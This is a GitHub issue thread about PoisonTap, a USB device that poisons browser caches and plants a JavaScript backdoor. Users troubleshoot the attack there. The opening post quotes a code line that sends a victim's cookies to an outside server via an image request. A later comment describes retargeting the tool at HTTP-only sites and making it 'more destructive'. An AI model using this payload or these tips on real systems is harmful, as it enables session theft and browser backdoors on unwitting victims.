samyk/poisontap #139: target_backdoor.js

bbroadstone, 2018-04-08:
Is this file supposed to be update to reflect my publically acessible domain with the correct port i.e.

```
new Image().src='http://ec2-15-185-131-5.us-east-2.compute.amazonaws.com:1337/poisontap/log.php?log='+document.cookies;
```

Also, should this file be changed to look like the above on the device's "target_backdoor.js" or the server's "target_backdoor.js" or both?

Thanks in advance for your help.

tleachman1234, 2019-04-08:
I also have been having no luck getting the backdoor websocket to send a client hello message to my server. @MR-D05 were you able to figure anything out?

Using `console.log()` I can see in the dev tools console that all of the files are executing when poisontap is plugged in an poisoning the cache, but the cached files never seem to run on any of the sites I visit after unplugging the device. The fact that http routes aren't being loaded would make sense, but I thought that a CORS statement was prepended to all cached file to allow for cross origin requests. Wouldn't this allow loading the cached http files?
I can see that nfl.com is loading files over http, yet the poisontap files never get loaded...

executionByFork, 2020-08-24:
I don't believe I did, unfortunately. This was just something I was playing around with in my free time though, I didn't spend a ton of time on it. One thing I never got to do was check some of the other popular forks of this project. Often people will fork and fix things in their own versions, maybe taking a look at some of the commits from other repos will point you in the right direction. It's been a while since I was messing with this so I don't remember exactly what I found, but from what I'm reading in my comment above and remembering is that the shell was never connecting. Its pretty common for security researchers to purposely break a piece of their exploit when they release it to the public so skids can't just plug and play. I think that may be the case here, the cookie file is enough to show exploitation is possible, the backdoor functionality may have been broken to prevent easy abuse.

itsecstudy, 2020-08-28:
Thanks for the response. I was able to get this working now and can see the backdoor open the web socket make a connection to my backend server. Some critical points are that most of the sites that poisontap uses are no longer vulnerable as now use https. I searched for a list of sites that still use HTTP and replaced the Alexa list with the http list, below the Doms() function, this returned much better results. I used Wireshark and a forensic analysis tool to search and ensure the cache was poisoned and step through what was happening, learned some good lessons and gained some knowledge in Java Script vulnerabilities and attacks. Currently looking at making the PoisonTap device a little more destructive. This is a good project and shows that even 4 years on can still be a relevant physical attack.